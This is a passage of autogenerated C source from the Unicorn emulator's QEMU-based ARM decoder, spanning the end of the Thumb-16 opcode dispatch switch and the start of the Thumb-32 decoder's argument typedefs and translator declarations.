disas_t16_extract_extend(ctx, &u.f_rrr_rot, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* 10110010 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:200 */ if (trans_SXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x1: /* 10110010 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:201 */ if (trans_SXTAB(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x00000280: /* 10110010 1....... */ disas_t16_extract_extend(ctx, &u.f_rrr_rot, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* 10110010 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:202 */ if (trans_UXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x1: /* 10110010 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:203 */ if (trans_UXTAB(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x00000a00: /* 10111010 0....... */ disas_t16_extract_rdm(ctx, &u.f_rr, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* 10111010 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:219 */ if (trans_REV(ctx, &u.f_rr)) return true; return false; case 0x1: /* 10111010 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:220 */ if (trans_REV16(ctx, &u.f_rr)) return true; return false; } return false; case 0x00000a80: /* 10111010 1....... */ switch ((insn >> 6) & 0x1) { case 0x0: /* 10111010 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:246 */ disas_t16_extract_disas_t16_Fmt_27(ctx, &u.f_i, insn); if (trans_HLT(ctx, &u.f_i)) return true; return false; case 0x1: /* 10111010 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:221 */ disas_t16_extract_rdm(ctx, &u.f_rr, insn); if (trans_REVSH(ctx, &u.f_rr)) return true; return false; } return false; } return false; case 0x1: /* 1011.0.1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:248 */ disas_t16_extract_disas_t16_Fmt_29(ctx, &u.f_disas_t1618, insn); if (trans_CBZ(ctx, &u.f_disas_t1618)) return true; return false; } return false; case 0x1: /* 1011.1.. ........ */ switch (insn & 0x00000a00) { case 0x00000000: /* 1011010. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:255 */ disas_t16_extract_disas_t16_Fmt_30(ctx, &u.f_ldst_block, insn); if (trans_STM(ctx, &u.f_ldst_block)) return true; return false; case 0x00000200: /* 1011011. ........ */ switch ((insn >> 5) & 0xf) { case 0x2: /* 10110110 010..... */ disas_t16_extract_disas_t16_Fmt_21(ctx, &u.f_setend, insn); switch (insn & 0x00000017) { case 0x00000010: /* 10110110 0101.000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:209 */ if (trans_SETEND(ctx, &u.f_setend)) return true; return false; } return false; case 0x3: /* 10110110 011..... */ switch ((insn >> 3) & 0x1) { case 0x0: /* 10110110 011.0... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:211 */ disas_t16_extract_disas_t16_Fmt_22(ctx, &u.f_cps, insn); if (trans_CPS(ctx, &u.f_cps)) return true; if ((insn & 0x00000004) == 0x00000000) { /* 10110110 011.00.. */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:212 */ disas_t16_extract_disas_t16_Fmt_23(ctx, &u.f_disas_t1616, insn); if (trans_CPS_v7m(ctx, &u.f_disas_t1616)) return true; } return false; } return false; } return false; case 0x00000800: /* 1011110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:257 */ disas_t16_extract_disas_t16_Fmt_31(ctx, &u.f_ldst_block, insn); if (trans_LDM_t16(ctx, &u.f_ldst_block)) return true; return false; case 0x00000a00: /* 1011111. ........ */ switch ((insn >> 8) & 0x1) { case 0x0: /* 10111110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:247 */ disas_t16_extract_disas_t16_Fmt_28(ctx, &u.f_i, insn); if (trans_BKPT(ctx, &u.f_i)) return true; return false; case 0x1: /* 10111111 ........ */ if ((insn & 0x0000000f) == 0x00000000) { /* 10111111 ....0000 */ if ((insn & 0x000000f0) == 0x00000010) { /* 10111111 00010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:227 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_YIELD(ctx, &u.f_empty)) return true; } if ((insn & 0x000000f0) == 0x00000020) { /* 10111111 00100000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:228 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_WFE(ctx, &u.f_empty)) return true; } if ((insn & 0x000000f0) == 0x00000030) { /* 10111111 00110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:229 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_WFI(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:237 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:239 */ disas_t16_extract_disas_t16_Fmt_26(ctx, &u.f_disas_t1617, insn); if (trans_IT(ctx, &u.f_disas_t1617)) return true; return false; } return false; } return false; } return false; case 0xc: /* 1100.... ........ */ disas_t16_extract_ldstm(ctx, &u.f_ldst_block, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 11000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:130 */ if (trans_STM(ctx, &u.f_ldst_block)) return true; return false; case 0x1: /* 11001... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:131 */ if (trans_LDM_t16(ctx, &u.f_ldst_block)) return true; return false; } return false; case 0xd: /* 1101.... ........ */ if ((insn & 0x00000f00) == 0x00000e00) { /* 11011110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:265 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_UDF(ctx, &u.f_empty)) return true; } if ((insn & 0x00000f00) == 0x00000f00) { /* 11011111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:266 */ disas_t16_extract_disas_t16_Fmt_28(ctx, &u.f_i, insn); if (trans_SVC(ctx, &u.f_i)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:267 */ disas_t16_extract_disas_t16_Fmt_32(ctx, &u.f_ci, insn); if (trans_B_cond_thumb(ctx, &u.f_ci)) return true; return false; case 0xe: /* 1110.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 11100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:274 */ disas_t16_extract_disas_t16_Fmt_33(ctx, &u.f_i, insn); if (trans_B(ctx, &u.f_i)) return true; return false; case 0x1: /* 11101... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:279 */ disas_t16_extract_disas_t16_Fmt_34(ctx, &u.f_i, insn); if (trans_BLX_suffix(ctx, &u.f_i)) return true; return false; } return false; case 0xf: /* 1111.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 11110... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:280 */ disas_t16_extract_disas_t16_Fmt_35(ctx, &u.f_i, insn); if (trans_BL_BLX_prefix(ctx, &u.f_i)) return true; return false; case 0x1: /* 11111... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:281 */ disas_t16_extract_disas_t16_Fmt_34(ctx, &u.f_i, insn); if (trans_BL_suffix(ctx, &u.f_i)) return true; return false; } return false; } return false; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/decode-t32.inc.c������������������������������������������������������0000664�0000000�0000000�00000460564�14675241067�0021004�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* This file is autogenerated by scripts/decodetree.py. */ typedef struct { int cond; int imm; } arg_ci; typedef struct { int rd; int sysm; } arg_disas_t3227; typedef struct { int mask; int rn; int sysm; } arg_disas_t3228; typedef struct { int A; int T; int rd; int rn; } arg_disas_t3230; typedef struct { int imm; int p; int rn; int rt; int rt2; int u; int w; } arg_ldst_ri2; typedef struct { int rm; int rn; } arg_tbranch; #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_s_rrr_shi arg_TST_xrri; static bool trans_TST_xrri(DisasContext *ctx, arg_TST_xrri *a); typedef arg_s_rrr_shi arg_AND_rrri; static bool trans_AND_rrri(DisasContext *ctx, arg_AND_rrri *a); typedef arg_s_rrr_shi arg_BIC_rrri; static bool trans_BIC_rrri(DisasContext *ctx, arg_BIC_rrri *a); typedef arg_s_rrr_shi arg_MOV_rxri; static bool trans_MOV_rxri(DisasContext *ctx, arg_MOV_rxri *a); typedef arg_s_rrr_shi arg_ORR_rrri; static bool trans_ORR_rrri(DisasContext *ctx, arg_ORR_rrri *a); typedef arg_s_rrr_shi arg_MVN_rxri; static bool trans_MVN_rxri(DisasContext *ctx, arg_MVN_rxri *a); typedef arg_s_rrr_shi arg_ORN_rrri; static bool trans_ORN_rrri(DisasContext *ctx, arg_ORN_rrri *a); typedef arg_s_rrr_shi arg_TEQ_xrri; static bool trans_TEQ_xrri(DisasContext *ctx, arg_TEQ_xrri *a); typedef arg_s_rrr_shi arg_EOR_rrri; static bool trans_EOR_rrri(DisasContext *ctx, arg_EOR_rrri *a); typedef arg_pkh arg_PKH; static bool trans_PKH(DisasContext *ctx, arg_PKH *a); typedef arg_s_rrr_shi arg_CMN_xrri; static bool trans_CMN_xrri(DisasContext *ctx, arg_CMN_xrri *a); typedef arg_s_rrr_shi arg_ADD_rrri; static bool trans_ADD_rrri(DisasContext *ctx, arg_ADD_rrri *a); typedef arg_s_rrr_shi arg_ADC_rrri; static bool trans_ADC_rrri(DisasContext *ctx, arg_ADC_rrri *a); typedef arg_s_rrr_shi arg_SBC_rrri; static bool trans_SBC_rrri(DisasContext *ctx, arg_SBC_rrri *a); typedef arg_s_rrr_shi arg_CMP_xrri; static bool trans_CMP_xrri(DisasContext *ctx, arg_CMP_xrri *a); typedef arg_s_rrr_shi arg_SUB_rrri; static bool trans_SUB_rrri(DisasContext *ctx, arg_SUB_rrri *a); typedef arg_s_rrr_shi arg_RSB_rrri; static bool trans_RSB_rrri(DisasContext *ctx, arg_RSB_rrri *a); typedef arg_s_rrr_shr arg_MOV_rxrr; static bool trans_MOV_rxrr(DisasContext *ctx, arg_MOV_rxrr *a); typedef arg_s_rri_rot arg_TST_xri; static bool trans_TST_xri(DisasContext *ctx, arg_TST_xri *a); typedef arg_s_rri_rot arg_AND_rri; static bool trans_AND_rri(DisasContext *ctx, arg_AND_rri *a); typedef arg_s_rri_rot arg_BIC_rri; static bool trans_BIC_rri(DisasContext *ctx, arg_BIC_rri *a); typedef arg_s_rri_rot arg_MOV_rxi; static bool trans_MOV_rxi(DisasContext *ctx, arg_MOV_rxi *a); typedef arg_s_rri_rot arg_ORR_rri; static bool trans_ORR_rri(DisasContext *ctx, arg_ORR_rri *a); typedef arg_s_rri_rot arg_MVN_rxi; static bool trans_MVN_rxi(DisasContext *ctx, arg_MVN_rxi *a); typedef arg_s_rri_rot arg_ORN_rri; static bool trans_ORN_rri(DisasContext *ctx, arg_ORN_rri *a); typedef arg_s_rri_rot arg_TEQ_xri; static bool trans_TEQ_xri(DisasContext *ctx, arg_TEQ_xri *a); typedef arg_s_rri_rot arg_EOR_rri; static bool trans_EOR_rri(DisasContext *ctx, arg_EOR_rri *a); typedef arg_s_rri_rot arg_CMN_xri; static bool trans_CMN_xri(DisasContext *ctx, arg_CMN_xri *a); typedef arg_s_rri_rot arg_ADD_rri; static bool trans_ADD_rri(DisasContext *ctx, arg_ADD_rri *a); typedef arg_s_rri_rot arg_ADC_rri; static bool trans_ADC_rri(DisasContext *ctx, arg_ADC_rri *a); typedef arg_s_rri_rot arg_SBC_rri; static bool trans_SBC_rri(DisasContext *ctx, arg_SBC_rri *a); typedef arg_s_rri_rot arg_CMP_xri; static bool trans_CMP_xri(DisasContext *ctx, arg_CMP_xri *a); typedef arg_s_rri_rot arg_SUB_rri; static bool trans_SUB_rri(DisasContext *ctx, arg_SUB_rri *a); typedef arg_s_rri_rot arg_RSB_rri; static bool trans_RSB_rri(DisasContext *ctx, arg_RSB_rri *a); typedef arg_ri arg_ADR; static bool trans_ADR(DisasContext *ctx, arg_ADR *a); typedef arg_ri arg_MOVW; static bool trans_MOVW(DisasContext *ctx, arg_MOVW *a); typedef arg_ri arg_MOVT; static bool trans_MOVT(DisasContext *ctx, arg_MOVT *a); typedef arg_sat arg_SSAT16; static bool trans_SSAT16(DisasContext *ctx, arg_SSAT16 *a); typedef arg_sat arg_SSAT; static bool trans_SSAT(DisasContext *ctx, arg_SSAT *a); typedef arg_sat arg_USAT16; static bool trans_USAT16(DisasContext *ctx, arg_USAT16 *a); typedef arg_sat arg_USAT; static bool trans_USAT(DisasContext *ctx, arg_USAT *a); typedef arg_bfx arg_SBFX; static bool trans_SBFX(DisasContext *ctx, arg_SBFX *a); typedef arg_bfx arg_UBFX; static bool trans_UBFX(DisasContext *ctx, arg_UBFX *a); typedef arg_bfi arg_BFCI; static bool trans_BFCI(DisasContext *ctx, arg_BFCI *a); typedef arg_s_rrrr arg_MUL; static bool trans_MUL(DisasContext *ctx, arg_MUL *a); typedef arg_s_rrrr arg_MLA; static bool trans_MLA(DisasContext *ctx, arg_MLA *a); typedef arg_rrrr arg_MLS; static bool trans_MLS(DisasContext *ctx, arg_MLS *a); typedef arg_s_rrrr arg_SMULL; static bool trans_SMULL(DisasContext *ctx, arg_SMULL *a); typedef arg_s_rrrr arg_UMULL; static bool trans_UMULL(DisasContext *ctx, arg_UMULL *a); typedef arg_s_rrrr arg_SMLAL; static bool trans_SMLAL(DisasContext *ctx, arg_SMLAL *a); typedef arg_s_rrrr arg_UMLAL; static bool trans_UMLAL(DisasContext *ctx, arg_UMLAL *a); typedef arg_rrrr arg_UMAAL; static bool trans_UMAAL(DisasContext *ctx, arg_UMAAL *a); typedef arg_rrrr arg_SMULWB; static bool trans_SMULWB(DisasContext *ctx, arg_SMULWB *a); typedef arg_rrrr arg_SMLAWB; static bool trans_SMLAWB(DisasContext *ctx, arg_SMLAWB *a); typedef arg_rrrr arg_SMULWT; static bool trans_SMULWT(DisasContext *ctx, arg_SMULWT *a); typedef arg_rrrr arg_SMLAWT; static bool trans_SMLAWT(DisasContext *ctx, arg_SMLAWT *a); typedef arg_rrrr arg_SMULBB; static bool trans_SMULBB(DisasContext *ctx, arg_SMULBB *a); typedef arg_rrrr arg_SMLABB; static bool trans_SMLABB(DisasContext *ctx, arg_SMLABB *a); typedef arg_rrrr arg_SMULBT; static bool trans_SMULBT(DisasContext *ctx, arg_SMULBT *a); typedef arg_rrrr arg_SMLABT; static bool trans_SMLABT(DisasContext *ctx, arg_SMLABT *a); typedef arg_rrrr arg_SMULTB; static bool trans_SMULTB(DisasContext *ctx, arg_SMULTB *a); typedef arg_rrrr arg_SMLATB; static bool trans_SMLATB(DisasContext *ctx, arg_SMLATB *a); typedef arg_rrrr arg_SMULTT; static bool trans_SMULTT(DisasContext *ctx, arg_SMULTT *a); typedef arg_rrrr arg_SMLATT; static bool trans_SMLATT(DisasContext *ctx, arg_SMLATT *a); typedef arg_rrrr arg_SMLALBB; static bool trans_SMLALBB(DisasContext *ctx, arg_SMLALBB *a); typedef arg_rrrr arg_SMLALBT; static bool trans_SMLALBT(DisasContext *ctx, arg_SMLALBT *a); typedef arg_rrrr arg_SMLALTB; static bool trans_SMLALTB(DisasContext *ctx, arg_SMLALTB *a); typedef arg_rrrr arg_SMLALTT; static bool trans_SMLALTT(DisasContext *ctx, arg_SMLALTT *a); typedef arg_rrrr arg_USADA8; static bool trans_USADA8(DisasContext *ctx, arg_USADA8 *a); typedef arg_rrrr arg_SMLAD; static bool trans_SMLAD(DisasContext *ctx, arg_SMLAD *a); typedef arg_rrrr arg_SMLADX; static bool trans_SMLADX(DisasContext *ctx, arg_SMLADX *a); typedef arg_rrrr arg_SMLSD; static bool trans_SMLSD(DisasContext *ctx, arg_SMLSD *a); typedef arg_rrrr arg_SMLSDX; static bool trans_SMLSDX(DisasContext *ctx, arg_SMLSDX *a); typedef arg_rrrr arg_SMLALD; static bool trans_SMLALD(DisasContext *ctx, arg_SMLALD *a); typedef arg_rrrr arg_SMLALDX; static bool trans_SMLALDX(DisasContext *ctx, arg_SMLALDX *a); typedef arg_rrrr arg_SMLSLD; static bool trans_SMLSLD(DisasContext *ctx, arg_SMLSLD *a); typedef arg_rrrr arg_SMLSLDX; static bool trans_SMLSLDX(DisasContext *ctx, arg_SMLSLDX *a); typedef arg_rrrr arg_SMMLA; static bool trans_SMMLA(DisasContext *ctx, arg_SMMLA *a); typedef arg_rrrr arg_SMMLAR; static bool trans_SMMLAR(DisasContext *ctx, arg_SMMLAR *a); typedef arg_rrrr arg_SMMLS; static bool trans_SMMLS(DisasContext *ctx, arg_SMMLS *a); typedef arg_rrrr arg_SMMLSR; static bool trans_SMMLSR(DisasContext *ctx, arg_SMMLSR *a); typedef arg_rrr arg_SDIV; static bool trans_SDIV(DisasContext *ctx, arg_SDIV *a); typedef arg_rrr arg_UDIV; static bool trans_UDIV(DisasContext *ctx, arg_UDIV *a); typedef arg_rrr arg_QADD; static bool trans_QADD(DisasContext *ctx, arg_QADD *a); typedef arg_rrr arg_QSUB; static bool trans_QSUB(DisasContext *ctx, arg_QSUB *a); typedef arg_rrr arg_QDADD; static bool trans_QDADD(DisasContext *ctx, arg_QDADD *a); typedef arg_rrr arg_QDSUB; static bool trans_QDSUB(DisasContext *ctx, arg_QDSUB *a); typedef arg_rrr arg_CRC32B; static bool trans_CRC32B(DisasContext *ctx, arg_CRC32B *a); typedef arg_rrr arg_CRC32H; static bool trans_CRC32H(DisasContext *ctx, arg_CRC32H *a); typedef arg_rrr arg_CRC32W; static bool trans_CRC32W(DisasContext *ctx, arg_CRC32W *a); typedef arg_rrr arg_CRC32CB; static bool trans_CRC32CB(DisasContext *ctx, arg_CRC32CB *a); typedef arg_rrr arg_CRC32CH; static bool trans_CRC32CH(DisasContext *ctx, arg_CRC32CH *a); typedef arg_rrr arg_CRC32CW; static bool trans_CRC32CW(DisasContext *ctx, arg_CRC32CW *a); typedef arg_rrr arg_SEL; static bool trans_SEL(DisasContext *ctx, arg_SEL *a); typedef arg_rr arg_REV; static bool trans_REV(DisasContext *ctx, arg_REV *a); typedef arg_rr arg_REV16; static bool trans_REV16(DisasContext *ctx, arg_REV16 *a); typedef arg_rr arg_RBIT; static bool trans_RBIT(DisasContext *ctx, arg_RBIT *a); typedef arg_rr arg_REVSH; static bool trans_REVSH(DisasContext *ctx, arg_REVSH *a); typedef arg_rr arg_CLZ; static bool trans_CLZ(DisasContext *ctx, arg_CLZ *a); typedef arg_empty arg_YIELD; static bool trans_YIELD(DisasContext *ctx, arg_YIELD *a); typedef arg_empty arg_WFE; static bool trans_WFE(DisasContext *ctx, arg_WFE *a); typedef arg_empty arg_WFI; static bool trans_WFI(DisasContext *ctx, arg_WFI *a); typedef arg_empty arg_NOP; static bool trans_NOP(DisasContext *ctx, arg_NOP *a); typedef arg_cps arg_CPS; static bool trans_CPS(DisasContext *ctx, arg_CPS *a); typedef arg_empty arg_CLREX; static bool trans_CLREX(DisasContext *ctx, arg_CLREX *a); typedef arg_empty arg_DSB; static bool trans_DSB(DisasContext *ctx, arg_DSB *a); typedef arg_empty arg_DMB; static bool trans_DMB(DisasContext *ctx, arg_DMB *a); typedef arg_empty arg_ISB; static bool trans_ISB(DisasContext *ctx, arg_ISB *a); typedef arg_empty arg_SB; static bool trans_SB(DisasContext *ctx, arg_SB *a); typedef arg_mrs_bank arg_MRS_bank; static bool trans_MRS_bank(DisasContext *ctx, arg_MRS_bank *a); typedef arg_mrs_reg arg_MRS_reg; static bool trans_MRS_reg(DisasContext *ctx, arg_MRS_reg *a); typedef arg_disas_t3227 arg_MRS_v7m; static bool trans_MRS_v7m(DisasContext *ctx, arg_MRS_v7m *a); typedef arg_msr_bank arg_MSR_bank; static bool trans_MSR_bank(DisasContext *ctx, arg_MSR_bank *a); typedef arg_msr_reg arg_MSR_reg; static bool trans_MSR_reg(DisasContext *ctx, arg_MSR_reg *a); typedef arg_disas_t3228 arg_MSR_v7m; static bool trans_MSR_v7m(DisasContext *ctx, arg_MSR_v7m *a); typedef arg_r arg_BXJ; static bool trans_BXJ(DisasContext *ctx, arg_BXJ *a); typedef arg_empty arg_ERET; static bool trans_ERET(DisasContext *ctx, arg_ERET *a); typedef arg_i arg_SMC; static bool trans_SMC(DisasContext *ctx, arg_SMC *a); typedef arg_i arg_HVC; static bool trans_HVC(DisasContext *ctx, arg_HVC *a); typedef arg_empty arg_UDF; static bool trans_UDF(DisasContext *ctx, arg_UDF *a); typedef arg_ci arg_B_cond_thumb; static bool trans_B_cond_thumb(DisasContext *ctx, arg_B_cond_thumb *a); typedef arg_ldst_rr arg_STRB_rr; static bool trans_STRB_rr(DisasContext *ctx, arg_STRB_rr *a); typedef arg_ldst_ri arg_STRB_ri; static bool trans_STRB_ri(DisasContext *ctx, arg_STRB_ri *a); typedef arg_ldst_ri arg_STRBT_ri; static bool trans_STRBT_ri(DisasContext *ctx, arg_STRBT_ri *a); typedef arg_ldst_rr arg_STRH_rr; static bool trans_STRH_rr(DisasContext *ctx, arg_STRH_rr *a); typedef arg_ldst_ri arg_STRH_ri; static bool trans_STRH_ri(DisasContext *ctx, arg_STRH_ri *a); typedef arg_ldst_ri arg_STRHT_ri; static bool trans_STRHT_ri(DisasContext *ctx, arg_STRHT_ri *a); typedef arg_ldst_rr arg_STR_rr; static bool trans_STR_rr(DisasContext *ctx, arg_STR_rr *a); typedef arg_ldst_ri arg_STR_ri; static bool trans_STR_ri(DisasContext *ctx, arg_STR_ri *a); typedef arg_ldst_ri arg_STRT_ri; static bool trans_STRT_ri(DisasContext *ctx, arg_STRT_ri *a); typedef arg_ldst_ri arg_LDRB_ri; static bool trans_LDRB_ri(DisasContext *ctx, arg_LDRB_ri *a); typedef arg_ldst_ri arg_LDRBT_ri; static bool trans_LDRBT_ri(DisasContext *ctx, arg_LDRBT_ri *a); typedef arg_ldst_rr arg_LDRB_rr; static bool trans_LDRB_rr(DisasContext *ctx, arg_LDRB_rr *a); typedef arg_ldst_ri arg_LDRH_ri; static bool trans_LDRH_ri(DisasContext *ctx, arg_LDRH_ri *a); typedef arg_ldst_ri arg_LDRHT_ri; static bool trans_LDRHT_ri(DisasContext *ctx, arg_LDRHT_ri *a); typedef arg_ldst_rr arg_LDRH_rr; static bool trans_LDRH_rr(DisasContext *ctx, arg_LDRH_rr *a); typedef arg_ldst_ri arg_LDR_ri; static bool trans_LDR_ri(DisasContext *ctx, arg_LDR_ri *a); typedef arg_ldst_ri arg_LDRT_ri; static bool trans_LDRT_ri(DisasContext *ctx, arg_LDRT_ri *a); typedef arg_ldst_rr arg_LDR_rr; static bool trans_LDR_rr(DisasContext *ctx, arg_LDR_rr *a); typedef arg_ldst_ri arg_LDRSB_ri; static bool trans_LDRSB_ri(DisasContext *ctx, arg_LDRSB_ri *a); typedef arg_ldst_ri arg_LDRSBT_ri; static bool trans_LDRSBT_ri(DisasContext *ctx, arg_LDRSBT_ri *a); typedef arg_ldst_rr arg_LDRSB_rr; static bool trans_LDRSB_rr(DisasContext *ctx, arg_LDRSB_rr *a); typedef arg_ldst_ri arg_LDRSH_ri; static bool trans_LDRSH_ri(DisasContext *ctx, arg_LDRSH_ri *a); typedef arg_ldst_ri arg_LDRSHT_ri; static bool trans_LDRSHT_ri(DisasContext *ctx, arg_LDRSHT_ri *a); typedef arg_ldst_rr arg_LDRSH_rr; static bool trans_LDRSH_rr(DisasContext *ctx, arg_LDRSH_rr *a); typedef arg_ldst_ri2 arg_STRD_ri_t32; static bool trans_STRD_ri_t32(DisasContext *ctx, arg_STRD_ri_t32 *a); typedef arg_ldst_ri2 arg_LDRD_ri_t32; static bool trans_LDRD_ri_t32(DisasContext *ctx, arg_LDRD_ri_t32 *a); typedef arg_empty arg_SG; static bool trans_SG(DisasContext *ctx, arg_SG *a); typedef arg_disas_t3230 arg_TT; static bool trans_TT(DisasContext *ctx, arg_TT *a); typedef arg_strex arg_STREX; static bool trans_STREX(DisasContext *ctx, arg_STREX *a); typedef arg_strex arg_STREXB; static bool trans_STREXB(DisasContext *ctx, arg_STREXB *a); typedef arg_strex arg_STREXH; static bool trans_STREXH(DisasContext *ctx, arg_STREXH *a); typedef arg_strex arg_STREXD_t32; static bool trans_STREXD_t32(DisasContext *ctx, arg_STREXD_t32 *a); typedef arg_strex arg_STLEX; static bool trans_STLEX(DisasContext *ctx, arg_STLEX *a); typedef arg_strex arg_STLEXB; static bool trans_STLEXB(DisasContext *ctx, arg_STLEXB *a); typedef arg_strex arg_STLEXH; static bool trans_STLEXH(DisasContext *ctx, arg_STLEXH *a); typedef arg_strex arg_STLEXD_t32; static bool trans_STLEXD_t32(DisasContext *ctx, arg_STLEXD_t32 *a); typedef arg_ldrex arg_STL; static bool trans_STL(DisasContext *ctx, arg_STL *a); typedef arg_ldrex arg_STLB; static bool trans_STLB(DisasContext *ctx, arg_STLB *a); typedef arg_ldrex arg_STLH; static bool trans_STLH(DisasContext *ctx, arg_STLH *a); typedef arg_ldrex arg_LDREX; static bool trans_LDREX(DisasContext *ctx, arg_LDREX *a); typedef arg_ldrex arg_LDREXB; static bool trans_LDREXB(DisasContext *ctx, arg_LDREXB *a); typedef arg_ldrex arg_LDREXH; static bool trans_LDREXH(DisasContext *ctx, arg_LDREXH *a); typedef arg_ldrex arg_LDREXD_t32; static bool trans_LDREXD_t32(DisasContext *ctx, arg_LDREXD_t32 *a); typedef arg_ldrex arg_LDAEX; static bool trans_LDAEX(DisasContext *ctx, arg_LDAEX *a); typedef arg_ldrex arg_LDAEXB; static bool trans_LDAEXB(DisasContext *ctx, arg_LDAEXB *a); typedef arg_ldrex arg_LDAEXH; static bool trans_LDAEXH(DisasContext *ctx, arg_LDAEXH *a); typedef arg_ldrex arg_LDAEXD_t32; static bool trans_LDAEXD_t32(DisasContext *ctx, arg_LDAEXD_t32 *a); typedef arg_ldrex arg_LDA; static bool trans_LDA(DisasContext *ctx, arg_LDA *a); typedef arg_ldrex arg_LDAB; static bool trans_LDAB(DisasContext *ctx, arg_LDAB *a); typedef arg_ldrex arg_LDAH; static bool trans_LDAH(DisasContext *ctx, arg_LDAH *a); typedef arg_tbranch arg_TBB; static bool trans_TBB(DisasContext *ctx, arg_TBB *a); typedef arg_tbranch arg_TBH; static bool trans_TBH(DisasContext *ctx, arg_TBH *a); typedef arg_rrr arg_SADD8; static bool trans_SADD8(DisasContext *ctx, arg_SADD8 *a); typedef arg_rrr arg_QADD8; static bool trans_QADD8(DisasContext *ctx, arg_QADD8 *a); typedef arg_rrr arg_SHADD8; static bool trans_SHADD8(DisasContext *ctx, arg_SHADD8 *a); typedef arg_rrr arg_UADD8; static bool trans_UADD8(DisasContext *ctx, arg_UADD8 *a); typedef arg_rrr arg_UQADD8; static bool trans_UQADD8(DisasContext *ctx, arg_UQADD8 *a); typedef arg_rrr arg_UHADD8; static bool trans_UHADD8(DisasContext *ctx, arg_UHADD8 *a); typedef arg_rrr arg_SADD16; static bool trans_SADD16(DisasContext *ctx, arg_SADD16 *a); typedef arg_rrr arg_QADD16; static bool trans_QADD16(DisasContext *ctx, arg_QADD16 *a); typedef arg_rrr arg_SHADD16; static bool trans_SHADD16(DisasContext *ctx, arg_SHADD16 *a); typedef arg_rrr arg_UADD16; static bool trans_UADD16(DisasContext *ctx, arg_UADD16 *a); typedef arg_rrr arg_UQADD16; static bool trans_UQADD16(DisasContext *ctx, arg_UQADD16 *a); typedef arg_rrr arg_UHADD16; static bool 